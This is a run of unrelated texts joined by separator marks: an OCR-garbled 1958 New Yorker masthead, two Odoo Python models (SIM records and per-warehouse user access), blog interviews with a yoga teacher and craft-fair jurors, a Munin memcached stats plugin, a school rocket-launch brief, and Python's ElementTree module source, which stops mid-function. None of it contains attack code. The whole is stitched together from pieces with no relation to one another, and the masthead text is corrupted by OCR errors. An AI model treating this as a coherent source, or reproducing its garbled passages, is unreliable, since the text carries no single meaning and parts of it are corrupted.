Inc., 25 \V. 43rd St., Kew York 36, N. Y. R. H. Fleischmann, chairman of the board' . .B. B.otsford, president; E. R. Spaulding and R. H. Truax, vice-presidents; P. F. Fleischmann, treasurer; 11. L. Fries.. secretary; A. J. Russell, Jr., adver: tI..,mg hrector. Vol. XXXIV, No. 45. December 27, 1958. Second-class postage paid at New York, N. Y. and at Greenwich, Conn. @, 1958 by The New Yorker J\lagazlne, I.nc., i th enited State a d Canada All rights reser ed. No part of this periodical may be reproduced without the consent' of The New Yorker. Punted In U. S. A. SubscnptIon rates: U. S. and posse:,slOns, 1 year $7.00; Çanada, Latin America, and Spain, $8.00. Other Foreign, $10.00. '" CHANGE OF ADDR.ESS I t is essential that subscribers ordering a change of address give four weeks' notice and provide their old as well as their new address. Please give postal zone numbers for both addresses.
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
from datetime import datetime, timedelta, date
from dateutil.relativedelta import relativedelta
class Sim(models.Model):
_name = 'sim'
_order = 'date_sim desc'
_inherit = ['mail.thread', 'ir.needaction_mixin']
user_number = fields.Char(string='SIM User Number', required=True, copy=False,)
phone = fields.Char(string='SIM Tel Number', required=False, copy=False,)
sim_id = fields.Char(string='SIM ID', copy=False,)
date_sim = fields.Datetime(string='Record Date', required=True, index=True, copy=False, default=fields.Datetime.now,)
iccid_number = fields.Char(string='Iccid Number', copy=False,)
reception_date = fields.Date(string='Reception Date', required=True, copy=False, store=True, index=True,)
#### auto input ### with reception_date ###
arrival_date = fields.Date(string='Arrival Date', store=True)
charge_date = fields.Date(string='Freebit Charge Date', store=True)
min_month = fields.Date(string='Minimum Usage Date', store=True)
expiration_date = fields.Date(string='Expiration Date', store=True)
#### Don't need it now ####
# cloud_name = field.Selection([
# ('tkcloud', 'TKCLOUD'),
# ('eagleeye', 'Eagle Eye'),
# ], string='service', default='tkcloud',)
# emp_number = fields.Integer(string="Emp Number",)
@api.onchange('reception_date')
def _date_calc(self):
main = fields.Datetime.from_string(self.reception_date)
if main:
arr = main + relativedelta(days=2)
self.update({'arrival_date': arr})
self.update({'charge_date': arr})
min = main + relativedelta(days=2, months=12)
self.update({'min_month': min})
exp = main + relativedelta(days=2, months=24)
self.update({'expiration_date': exp})
return
@api.multi
def applicate_sim(self):
pass
@api.multi
def arrival_sim(self):
pass
class SimType(models.Model):
_name = 'sim_type'
_order = 'date_sim desc'
sim_type_id = fields.Char(string='SIM Type ID', required=True, copy=False,)
max_storage = fields.Char(string='Max Strage')
business_number = fields.Char(string='Business Number')
size_code = fields.Char(string='Size Code')
deta_code = fields.Char(string='Kakinkaishibi')
datermination = fields.Char(string='Sansyutuhouhou')
pay_per_up = fields.Char(string='Juuryoukakin Up')
pay_per_down = fields.Char(string='Juuryoukakin Down')
min_use_time = fields.Char(string='Minimum Perion of Use')
### charge ###
basic_charge = fields.Integer(string='Basic Charge')
cancel_charge = fields.Integer(string='Cancel Charge')
admin_charge = fields.Integer(string='Admin Charge')
### commission ###
opening_sim = fields.Integer(string='Opening Sim Commission')
opening_sim_up = fields.Integer(string='Opening Sim Commission up')
unreturned_sim = fields.Integer(string='Unreturned Sim Commission')
reissure_sim = fields.Integer(string='Reissure Sim Commission')
change_plan = fields.Integer(string='Change Plan Commission')
change_size = fields.Integer(string='Change Size Commission')
redelivery_sim = fields.Integer(string='Redelivery Sim Commission')
stop_sim = fields.Integer(string='Stop Sim Commission')
delivery_sim = fields.Integer(string='Delivery Sim Commission')
universal_service = fields.Integer(string='Universal Service Commission')
cancel_charge_first = fields.Integer(string='Cancel Charge 1month')
cancel_charge_year = fields.Integer(string='Cancel Charge Year')
charge100 = fields.Integer(string='100MB')
charge500 = fields.Integer(string='500MB')
charge1000 = fields.Integer(string='1000MB')
ip_month = fields.Integer(string='IP Charge')
date_model = fields.Char(string='Date Model')
|
As most of you know, we love to host awesomely unique events here at Fresh Tracks Farm. One of our newest combinations is wine and YOGA! I think we can all agree that yoga and wine is an amazing and refreshing combination. I find that it is the best way to revitalize and relax, which is why we hope you FTF fans will join in! The wonderful woman behind this special event is Lori Flower. Yoga has been a part of her life for the past 18 years, and we feel so lucky to have her share her passion with us here. I sat down with Lori on a snowy Thursday night and asked her a few questions about her life and career with yoga.
Camila: How long have you been teaching/doing yoga?
Lori: I’ve been practicing yoga since 1994 and teaching since 2000.
C: What drove you to become a yoga instructor?
L: Destiny. I had been on a different track in college, graduating with a degree in Film, but was so inspired by my yoga practice and enjoyed that much more than working in the film industry. An opportunity arose for me to work as the staff photographer at a Holistic Learning center (Omega) where I could immerse myself in Yoga, meditation and other healing modalities while meeting inspiring teachers daily. That was the catalyst for creating a change in my life to attend yoga teacher training and pursue it as a life path.
C: How do you feel like yoga affects your everyday life?
L: Yoga affects my everyday life immensely. I feel more responsible for taking care of my health and well-being. I center myself daily through conscious breathing and self-motivate through strengthening yogic practices. It’s a constant reminder that I’m dedicated to the path of self-awareness. I also work with Mantra Japa (the mental practice of positive affirmations) to clear my mind and focus on cultivating good things in life.
C: Other than Yoga, what are some of your favorite hobbies?
L: Besides yoga, I also have a background as an herbalist, and run an organic and natural skin care company called Perfect Cream (www.perfectcream.com)where I handcraft herbal skin remedies. I also enjoy cooking vegan and falling in love!
C: What are some of your favorite yoga positions and why?
L: Hand Stands and Pigeon Pose. Hand stands are more challenging and take a lot of discipline. They’re easy for me now, but I like to look back at all the hard work I did to get there. And the pigeon pose is great for the hips!
C: Lastly, what is your favorite FTF wine?
L: The Maple wine! It’s so unique.
If you would like to register for a class please contact Lori at [email protected]. It is $8 per class and ALL LEVELS ARE WELCOME. Don’t be shy!
Or like her on Facebook! https://www.facebook.com/pages/Sattva-Yoga/140333232749366?ref=ts&fref=ts.
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Limit User Access per Warehouse
# Copyright (C) 2016 Vadim (<http://based.at>).
# OpenERP, Open Source Management Solution
# Copyright (c) 2004-2016 Odoo S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api
class ResUsers(models.Model):
_inherit = 'res.users'
@api.one
def _get_location_ids(self):
""" Get the list of locations that either not attached to a warehouse (virtual location, asset Location)
OR user has access to the warehouse this location belongs to
"""
locations = self.env['stock.location'].search([])
if self.warehouse_ids:
# Allow locations that are not attached to a warehouse
w_ids = [False] + [w.id for w in self.warehouse_ids]
locations = locations.filtered(lambda r: locations.get_warehouse(r) in w_ids)
self.location_ids = locations
warehouse_ids = fields.Many2many('stock.warehouse', string='Allowed Warehouses',
help='List of allowed warehouses. If empty, the user can access all warehouses.')
location_ids = fields.One2many('stock.location', string='Allowed Locations', compute='_get_location_ids')
class StockWarehouse(models.Model):
_inherit = 'stock.warehouse'
@api.one
def _get_user_ids(self):
""" Get the list of "Warehouse / Users" who can access this warehouse
"""
user_ids = [user.id for user in self.env['ir.model.data'].xmlid_to_object('stock.group_stock_user').users
if not user.warehouse_ids or self in user.warehouse_ids]
self.user_ids = user_ids
user_ids = fields.One2many('res.users', string='Authorized Users', compute='_get_user_ids',
help='List of users authorized to access the warehouse.')
|
A. I started making art really young, as I grew up in a small arts community filled with galleries and artists. It was perfectly normal to pursue the arts as a way of like. I learned to sew when I was 10 and did loads of other arts activities, like ballet, oil painting, and ceramics as I grew up. I received a BFA in studio art from the School of the Art Institute of Chicago with a focus in Film, Video, and New Media. I made art, sewed my own wardrobe, and worked in arts administration until one day when I participated in the second Renegade Craft Fair. I sold clothing I made and it was a hit. From there it all just snowballed- I started writing for magazines, wrote my first book for Random House, started teaching sewing, and then launched my line of sewing patterns. I'm still writing, teaching, and designing today!
Q. What/who is your biggest inspiration?
A. My patterns are inspired by a host of things, but mostly from observing people, films, and vintage materials like yearbooks and sewing patterns. I want the women who sew my patterns to feel beautiful and unfussy. I prefer a quiet life and never want the need to be clothed to be a burden; rather it should be a joy.
Q. How did you get into your position in the arts & crafts world?
A. I got here after years and years of stubborn hard work! There is no way to work for yourself with our working really hard at it.
Q. Tell us about a few favorites of your: Weekend activity? Food? Color? Animal?
A. Since I almost always teach on Saturdays, my weekends are usually Sunday and Monday. A favorite Sunday activity is the simple pleasure of having a long leisurely breakfast and reading the Sunday papers with my boyfriend. A favorite food is hummus! It's a weakness for sure. My favorite "colors" are green and blue, but my real favorite is gray, if that can be considered a color. And my favorite animals are my kitties, Sally and Pinta.
Q. What do you love most about the handmade movement?
A. I love it when my students come into class- innocently learning to sew so they can make clothes for their kids or something for their home- then slowly become aware of what a revolutionary act this truly is. They don't come to class with the intention of rethinking how things are made and how they consume mass-produced products, but most eventually start to think about the cost of materials and labor really quickly into learning things for themselves. It's empowering in a way that they didn't expect, and to witness that transformation is incredible.
Q. What is the most important feature in an artist's application for you?
A. Honesty. The work must read true and like it's coming from their own voice.
Q. What are you most looking forward to in being a part of the Jackalope Arts jury?
A. I'm excited to seeing all the work come in and then to see the finished show!
Q. Where can we find our more about you?
Learn about all of the Pasadena, Jackalope jurors here!
A. I moved to LA from Brooklyn in 2013 to open Los Angeles County Store. I was inspired by the makers I met in NYC while hawking my baubles under the Wabisabi Brooklyn brand.
A. I continue to be inspired by the creativity, hard work, and determination of the local artists and artisans whose work I represent in the shop.
A. I performed a magic trick: I turned my Brooklyn house into a Los Angeles Shop. Also, equal parts hustle, chutzpah, and the encouragement and support of others.
Weekend activity: Napping. Food: Bread. Color: Periwinkle. Animal: French Bulldog puppies make any day better. But any dog or kitty pretty much.
A. It restores my faith in humanity and connects me to some of the best people I’ve ever met.
Q: What is most important feature in an artist’s application for you?A. Nothing matters more than the work itself. Is it original? Is it well-made? Do I want it or know someone who wants it?
A. Seeing all the amazing stuff people make!
L.A. County Store on Instagram!
Check out all of our Pasadena jurors here!
|
#!/usr/bin/env python
import os
import socket
from vendor.munin import MuninPlugin
class MuninMemcachedPlugin(MuninPlugin):
category = "Memcached"
def autoconf(self):
try:
self.get_stats()
except socket.error:
return False
return True
def get_stats(self):
host = os.environ.get('MEMCACHED_HOST') or '127.0.0.1'
port = int(os.environ.get('MEMCACHED_PORT') or '11211')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("stats\n")
buf = ""
while 'END\r\n' not in buf:
buf += s.recv(1024)
stats = (x.split(' ', 2) for x in buf.split('\r\n'))
stats = dict((x[1], x[2]) for x in stats if x[0] == 'STAT')
s.close()
return stats
def execute(self):
stats = self.get_stats()
values = {}
for k, v in self.fields:
try:
value = stats[k]
except KeyError:
value = "U"
values[k] = value
return values
|
June 3, 2010 – Katy, Texas – Morton Ranch Junior High students, including Ashley Thornhill (pictured) and science teacher, Roy Eriksen recently participated in a model rocket project associated with a unit on space exploration. Students got the chance to launch their model rockets from the MRJH football fields. Eriksen played an integral role in designing the lab, as he helped coordinate which rockets the students could build and the order in which they would be launched. The successful project was a collaborative effort among the entire sixth-grade science team, he says, and it was great to see students so engaged and excited about science. Please mention you found this on www.KatyMagazine.com.
|
"""Lightweight XML support for Python.
XML is an inherently hierarchical data format, and the most natural way to
represent it is with a tree. This module has two classes for this purpose:
1. ElementTree represents the whole XML document as a tree and
2. Element represents a single node in this tree.
Interactions with the whole document (reading and writing to/from files) are
usually done on the ElementTree level. Interactions with a single XML element
and its sub-elements are done on the Element level.
Element is a flexible container object designed to store hierarchical data
structures in memory. It can be described as a cross between a list and a
dictionary. Each Element has a number of properties associated with it:
'tag' - a string containing the element's name.
'attributes' - a Python dictionary storing the element's attributes.
'text' - a string containing the element's text content.
'tail' - an optional string containing text after the element's end tag.
And a number of child elements stored in a Python sequence.
To create an element instance, use the Element constructor,
or the SubElement factory function.
You can also use the ElementTree class to wrap an element structure
and convert it to and from XML.
"""
#---------------------------------------------------------------------
# Licensed to PSF under a Contributor Agreement.
# See http://www.python.org/psf/license for licensing details.
#
# ElementTree
# Copyright (c) 1999-2008 by Fredrik Lundh. All rights reserved.
#
# fredrik@pythonware.com
# http://www.pythonware.com
# --------------------------------------------------------------------
# The ElementTree toolkit is
#
# Copyright (c) 1999-2008 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
__all__ = [
# public symbols
"Comment",
"dump",
"Element", "ElementTree",
"fromstring", "fromstringlist",
"indent", "iselement", "iterparse",
"parse", "ParseError",
"PI", "ProcessingInstruction",
"QName",
"SubElement",
"tostring", "tostringlist",
"TreeBuilder",
"VERSION",
"XML", "XMLID",
"XMLParser", "XMLPullParser",
"register_namespace",
"canonicalize", "C14NWriterTarget",
]
VERSION = "1.3.0"
import sys
import re
import warnings
import io
import collections
import collections.abc
import contextlib
from . import ElementPath
class ParseError(SyntaxError):
"""An error when parsing an XML document.
In addition to its exception value, a ParseError contains
two extra attributes:
'code' - the specific exception code
'position' - the line and column of the error
"""
pass
# --------------------------------------------------------------------
def iselement(element):
"""Return True if *element* appears to be an Element."""
return hasattr(element, 'tag')
class Element:
"""An XML element.
This class is the reference implementation of the Element interface.
An element's length is its number of subelements. That means if you
want to check if an element is truly empty, you should check BOTH
its length AND its text attribute.
The element tag, attribute names, and attribute values can be either
bytes or strings.
*tag* is the element name. *attrib* is an optional dictionary containing
element attributes. *extra* are additional element attributes given as
keyword arguments.
Example form:
<tag attrib>text<child/>...</tag>tail
"""
tag = None
"""The element's name."""
attrib = None
"""Dictionary of the element's attributes."""
text = None
"""
Text before first subelement. This is either a string or the value None.
Note that if there is no text, this attribute may be either
None or the empty string, depending on the parser.
"""
tail = None
"""
Text after this element's end tag, but before the next sibling element's
start tag. This is either a string or the value None. Note that if there
was no text, this attribute may be either None or an empty string,
depending on the parser.
"""
def __init__(self, tag, attrib={}, **extra):
if not isinstance(attrib, dict):
raise TypeError("attrib must be dict, not %s" % (
attrib.__class__.__name__,))
self.tag = tag
self.attrib = {**attrib, **extra}
self._children = []
def __repr__(self):
return "<%s %r at %#x>" % (self.__class__.__name__, self.tag, id(self))
def makeelement(self, tag, attrib):
"""Create a new element with the same type.
*tag* is a string containing the element name.
*attrib* is a dictionary containing the element attributes.
Do not call this method, use the SubElement factory function instead.
"""
return self.__class__(tag, attrib)
def copy(self):
"""Return copy of current element.
This creates a shallow copy. Subelements will be shared with the
original tree.
"""
warnings.warn(
"elem.copy() is deprecated. Use copy.copy(elem) instead.",
DeprecationWarning
)
return self.__copy__()
def __copy__(self):
elem = self.makeelement(self.tag, self.attrib)
elem.text = self.text
elem.tail = self.tail
elem[:] = self
return elem
def __len__(self):
return len(self._children)
def __bool__(self):
warnings.warn(
"The behavior of this method will change in future versions. "
"Use specific 'len(elem)' or 'elem is not None' test instead.",
FutureWarning, stacklevel=2
)
return len(self._children) != 0 # emulate old behaviour, for now
def __getitem__(self, index):
return self._children[index]
def __setitem__(self, index, element):
if isinstance(index, slice):
for elt in element:
self._assert_is_element(elt)
else:
self._assert_is_element(element)
self._children[index] = element
def __delitem__(self, index):
del self._children[index]
def append(self, subelement):
"""Add *subelement* to the end of this element.
The new element will appear in document order after the last existing
subelement (or directly after the text, if it's the first subelement),
but before the end tag for this element.
"""
self._assert_is_element(subelement)
self._children.append(subelement)
def extend(self, elements):
"""Append subelements from a sequence.
*elements* is a sequence with zero or more elements.
"""
for element in elements:
self._assert_is_element(element)
self._children.append(element)
def insert(self, index, subelement):
"""Insert *subelement* at position *index*."""
self._assert_is_element(subelement)
self._children.insert(index, subelement)
def _assert_is_element(self, e):
# Need to refer to the actual Python implementation, not the
# shadowing C implementation.
if not isinstance(e, _Element_Py):
raise TypeError('expected an Element, not %s' % type(e).__name__)
def remove(self, subelement):
"""Remove matching subelement.
Unlike the find methods, this method compares elements based on
identity, NOT ON tag value or contents. To remove subelements by
other means, the easiest way is to use a list comprehension to
select what elements to keep, and then use slice assignment to update
the parent element.
ValueError is raised if a matching element could not be found.
"""
# assert iselement(element)
self._children.remove(subelement)
def find(self, path, namespaces=None):
"""Find first matching element by tag name or path.
*path* is a string having either an element tag or an XPath,
*namespaces* is an optional mapping from namespace prefix to full name.
Return the first matching element, or None if no element was found.
"""
return ElementPath.find(self, path, namespaces)
def findtext(self, path, default=None, namespaces=None):
"""Find text for first matching element by tag name or path.
*path* is a string having either an element tag or an XPath,
*default* is the value to return if the element was not found,
*namespaces* is an optional mapping from namespace prefix to full name.
Return text content of first matching element, or default value if
none was found. Note that if an element is found having no text
content, the empty string is returned.
"""
return ElementPath.findtext(self, path, default, namespaces)
def findall(self, path, namespaces=None):
"""Find all matching subelements by tag name or path.
*path* is a string having either an element tag or an XPath,
*namespaces* is an optional mapping from namespace prefix to full name.
Returns list containing all matching elements in document order.
"""
return ElementPath.findall(self, path, namespaces)
def iterfind(self, path, namespaces=None):
"""Find all matching subelements by tag name or path.
*path* is a string having either an element tag or an XPath,
*namespaces* is an optional mapping from namespace prefix to full name.
Return an iterable yielding all matching elements in document order.
"""
return ElementPath.iterfind(self, path, namespaces)
def clear(self):
"""Reset element.
This function removes all subelements, clears all attributes, and sets
the text and tail attributes to None.
"""
self.attrib.clear()
self._children = []
self.text = self.tail = None
def get(self, key, default=None):
"""Get element attribute.
Equivalent to attrib.get, but some implementations may handle this a
bit more efficiently. *key* is what attribute to look for, and
*default* is what to return if the attribute was not found.
Returns a string containing the attribute value, or the default if
attribute was not found.
"""
return self.attrib.get(key, default)
def set(self, key, value):
"""Set element attribute.
Equivalent to attrib[key] = value, but some implementations may handle
this a bit more efficiently. *key* is what attribute to set, and
*value* is the attribute value to set it to.
"""
self.attrib[key] = value
def keys(self):
"""Get list of attribute names.
Names are returned in an arbitrary order, just like an ordinary
Python dict. Equivalent to attrib.keys()
"""
return self.attrib.keys()
def items(self):
"""Get element attributes as a sequence.
The attributes are returned in arbitrary order. Equivalent to
attrib.items().
Return a list of (name, value) tuples.
"""
return self.attrib.items()
def iter(self, tag=None):
"""Create tree iterator.
The iterator loops over the element and all subelements in document
order, returning all elements with a matching tag.
If the tree structure is modified during iteration, new or removed
elements may or may not be included. To get a stable set, use the
list() function on the iterator, and loop over the resulting list.
*tag* is what tags to look for (default is to return all elements)
Return an iterator containing all the matching elements.
"""
if tag == "*":
tag = None
if tag is None or self.tag == tag:
yield self
for e in self._children:
yield from e.iter(tag)
def itertext(self):
"""Create text iterator.
The iterator loops over the element and all subelements in document
order, returning all inner text.
"""
tag = self.tag
if not isinstance(tag, str) and tag is not None:
return
t = self.text
if t:
yield t
for e in self:
yield from e.itertext()
t = e.tail
if t:
yield t
def SubElement(parent, tag, attrib={}, **extra):
"""Subelement factory which creates an element instance, and appends it
to an existing parent.
The element tag, attribute names, and attribute values can be either
bytes or Unicode strings.
*parent* is the parent element, *tag* is the subelements name, *attrib* is
an optional directory containing element attributes, *extra* are
additional attributes given as keyword arguments.
"""
attrib = {**attrib, **extra}
element = parent.makeelement(tag, attrib)
parent.append(element)
return element
def Comment(text=None):
"""Comment element factory.
This function creates a special element which the standard serializer
serializes as an XML comment.
*text* is a string containing the comment string.
"""
element = Element(Comment)
element.text = text
return element
def ProcessingInstruction(target, text=None):
"""Processing Instruction element factory.
This function creates a special element which the standard serializer
serializes as an XML comment.
*target* is a string containing the processing instruction, *text* is a
string containing the processing instruction contents, if any.
"""
element = Element(ProcessingInstruction)
element.text = target
if text:
element.text = element.text + " " + text
return element
PI = ProcessingInstruction
class QName:
"""Qualified name wrapper.
This class can be used to wrap a QName attribute value in order to get
proper namespace handing on output.
*text_or_uri* is a string containing the QName value either in the form
{uri}local, or if the tag argument is given, the URI part of a QName.
*tag* is an optional argument which if given, will make the first
argument (text_or_uri) be interpreted as a URI, and this argument (tag)
be interpreted as a local name.
"""
def __init__(self, text_or_uri, tag=None):
if tag:
text_or_uri = "{%s}%s" % (text_or_uri, tag)
self.text = text_or_uri
def __str__(self):
return self.text
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, self.text)
def __hash__(self):
return hash(self.text)
def __le__(self, other):
if isinstance(other, QName):
return self.text <= other.text
return self.text <= other
def __lt__(self, other):
if isinstance(other, QName):
return self.text < other.text
return self.text < other
def __ge__(self, other):
if isinstance(other, QName):
return self.text >= other.text
return self.text >= other
def __gt__(self, other):
if isinstance(other, QName):
return self.text > other.text
return self.text > other
def __eq__(self, other):
if isinstance(other, QName):
return self.text == other.text
return self.text == other
# --------------------------------------------------------------------
class ElementTree:
"""An XML element hierarchy.
This class also provides support for serialization to and from
standard XML.
*element* is an optional root element node,
*file* is an optional file handle or file name of an XML file whose
contents will be used to initialize the tree with.
"""
def __init__(self, element=None, file=None):
# assert element is None or iselement(element)
self._root = element # first node
if file:
self.parse(file)
def getroot(self):
"""Return root element of this tree."""
return self._root
def _setroot(self, element):
"""Replace root element of this tree.
This will discard the current contents of the tree and replace it
with the given element. Use with care!
"""
# assert iselement(element)
self._root = element
def parse(self, source, parser=None):
"""Load external XML document into element tree.
*source* is a file name or file object, *parser* is an optional parser
instance that defaults to XMLParser.
ParseError is raised if the parser fails to parse the document.
Returns the root element of the given source document.
"""
close_source = False
if not hasattr(source, "read"):
source = open(source, "rb")
close_source = True
try:
if parser is None:
# If no parser was specified, create a default XMLParser
parser = XMLParser()
if hasattr(parser, '_parse_whole'):
# The default XMLParser, when it comes from an accelerator,
# can define an internal _parse_whole API for efficiency.
# It can be used to parse the whole source without feeding
# it with chunks.
self._root = parser._parse_whole(source)
return self._root
while True:
data = source.read(65536)
if not data:
break
parser.feed(data)
self._root = parser.close()
return self._root
finally:
if close_source:
source.close()
def iter(self, tag=None):
"""Create and return tree iterator for the root element.
The iterator loops over all elements in this tree, in document order.
*tag* is a string with the tag name to iterate over
(default is to return all elements).
"""
# assert self._root is not None
return self._root.iter(tag)
def find(self, path, namespaces=None):
"""Find first matching element by tag name or path.
Same as getroot().find(path), which is Element.find()
*path* is a string having either an element tag or an XPath,
*namespaces* is an optional mapping from namespace prefix to full name.
Return the first matching element, or None if no element was found.
"""
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.find(path, namespaces)
def findtext(self, path, default=None, namespaces=None):
"""Find first matching element by tag name or path.
Same as getroot().findtext(path), which is Element.findtext()
*path* is a string having either an element tag or an XPath,
*namespaces* is an optional mapping from namespace prefix to full name.
Return the first matching element, or None if no element was found.
"""
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.findtext(path, default, namespaces)
def findall(self, path, namespaces=None):
"""Find all matching subelements by tag name or path.
Same as getroot().findall(path), which is Element.findall().
*path* is a string having either an element tag or an XPath,
*namespaces* is an optional mapping from namespace prefix to full name.
Return list containing all matching elements in document order.
"""
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.findall(path, namespaces)
def iterfind(self, path, namespaces=None):
"""Find all matching subelements by tag name or path.
Same as getroot().iterfind(path), which is element.iterfind()
*path* is a string having either an element tag or an XPath,
*namespaces* is an optional mapping from namespace prefix to full name.
Return an iterable yielding all matching elements in document order.
"""
# assert self._root is not None
if path[:1] == "/":
path = "." + path
warnings.warn(
"This search is broken in 1.3 and earlier, and will be "
"fixed in a future version. If you rely on the current "
"behaviour, change it to %r" % path,
FutureWarning, stacklevel=2
)
return self._root.iterfind(path, namespaces)
def write(self, file_or_filename,
encoding=None,
xml_declaration=None,
default_namespace=None,
method=None, *,
short_empty_elements=True):
"""Write element tree to a file as XML.
Arguments:
*file_or_filename* -- file name or a file object opened for writing
*encoding* -- the output encoding (default: US-ASCII)
*xml_declaration* -- bool indicating if an XML declaration should be
added to the output. If None, an XML declaration
is added if encoding IS NOT either of:
US-ASCII, UTF-8, or Unicode
*default_namespace* -- sets the default XML namespace (for "xmlns")
*method* -- either "xml" (default), "html, "text", or "c14n"
*short_empty_elements* -- controls the formatting of elements
that contain no content. If True (default)
they are emitted as a single self-closed
tag, otherwise they are emitted as a pair
of start/end tags
"""
if not method:
method = "xml"
elif method not in _serialize:
raise ValueError("unknown method %r" % method)
if not encoding:
if method == "c14n":
encoding = "utf-8"
else:
encoding = "us-ascii"
enc_lower = encoding.lower()
with _get_writer(file_or_filename, enc_lower) as write:
if method == "xml" and (xml_declaration or
(xml_declaration is None and
enc_lower not in ("utf-8", "us-ascii", "unicode"))):
declared_encoding = encoding
if enc_lower == "unicode":
# Retrieve the default encoding for the xml declaration
import locale
declared_encoding = locale.getpreferredencoding()
write("<?xml version='1.0' encoding='%s'?>\n" % (
declared_encoding,))
if method == "text":
_serialize_text(write, self._root)
else:
qnames, namespaces = _namespaces(self._root, default_namespace)
serialize = _serialize[method]
serialize(write, self._root, qnames, namespaces,
short_empty_elements=short_empty_elements)
def write_c14n(self, file):
# lxml.etree compatibility. use output method instead
return self.write(file, method="c14n")
# --------------------------------------------------------------------
# serialization support
@contextlib.contextmanager
def _get_writer(file_or_filename, encoding):
# returns text write method and release all resources after using
try:
write = file_or_filename.write
except AttributeError:
# file_or_filename is a file name
if encoding == "unicode":
file = open(file_or_filename, "w")
else:
file = open(file_or_filename, "w", encoding=encoding,
errors="xmlcharrefreplace")
with file:
yield file.write
else:
# file_or_filename is a file-like object
# encoding determines if it is a text or binary writer
if encoding == "unicode":
# use a text writer as is
yield write
else:
# wrap a binary writer with TextIOWrapper
with contextlib.ExitStack() as stack:
if isinstance(file_or_filename, io.BufferedIOBase):
file = file_or_filename
elif isinstance(file_or_filename, io.RawIOBase):
file = io.BufferedWriter(file_or_filename)
# Keep the original file open when the BufferedWriter is
# destroyed
stack.callback(file.detach)
else:
# This is to handle passed objects that aren't in the
# IOBase hierarchy, but just have a write method
file = io.BufferedIOBase()
file.writable = lambda: True
file.write = write
try:
# TextIOWrapper uses this methods to determine
# if BOM (for UTF-16, etc) should be added
file.seekable = file_or_filename.seekable
file.tell = file_or_filename.tell
except AttributeError:
pass
file = io.TextIOWrapper(file,
encoding=encoding,
errors="xmlcharrefreplace",
newline="\n")
# Keep the original file open when the TextIOWrapper is
# destroyed
stack.callback(file.detach)
yield file.write
def _namespaces(elem, default_namespace=None):
# identify namespaces used in this tree
# maps qnames to *encoded* prefix:local names
qnames = {None: None}
# maps uri:s to prefixes
namespaces = {}
if default_namespace:
namespaces[default_namespace] = ""
def add_qname(qname):
# calculate serialized qname representation
try:
if qname[:1] == "{":
uri, tag = qname[1:].rsplit("}", 1)
prefix = namespaces.get(uri)
if prefix is None:
prefix = _namespace_map.get(uri)
if prefix is None:
prefix = "ns%d" % len(namespaces)
if prefix != "xml":
namespaces[uri] = prefix
if prefix:
qnames[qname] = "%s:%s" % (prefix, tag)
else:
qnames[qname] = tag # default element
else:
if default_namespace:
# FIXME: can this be handled in XML 1.0?
raise ValueError(
"cannot use non-qualified names with "
"default_namespace option"
)
qnames[qname] = qname
except TypeError:
_raise_serialization_error(qname)
# populate qname and namespaces table
for elem in elem.iter():
tag = elem.tag
if isinstance(tag, QName):
if tag.text not in qnames:
add_qname(tag.text)
elif isinstance(tag, str):
if tag not in qnames:
add_qname(tag)
elif tag is not None and tag is not Comment and tag is not PI:
_raise_serialization_error(tag)
for key, value in elem.items():
if isinstance(key, QName):
key = key.text
if key not in qnames:
add_qname(key)
if isinstance(value, QName) and value.text not in qnames:
add_qname(value.text)
text = elem.text
if isinstance(text, QName) and text.text not in qnames:
add_qname(text.text)
return qnames, namespaces
def _serialize_xml(write, elem, qnames, namespaces,
short_empty_elements, **kwargs):
tag = elem.tag
text = elem.text
if tag is Comment:
write("<!--%s-->" % text)
elif tag is ProcessingInstruction:
write("<?%s?>" % text)
else:
tag = qnames[tag]
if tag is None:
if text:
write(_escape_cdata(text))
for e in elem:
_serialize_xml(write, e, qnames, None,
short_empty_elements=short_empty_elements)
else:
write("<" + tag)
items = list(elem.items())
if items or namespaces:
if namespaces:
for v, k in sorted(namespaces.items(),
key=lambda x: x[1]): # sort on prefix
if k:
k = ":" + k
write(" xmlns%s=\"%s\"" % (
k,
_escape_attrib(v)
))
for k, v in items:
if isinstance(k, QName):
k = k.text
if isinstance(v, QName):
v = qnames[v.text]
else:
v = _escape_attrib(v)
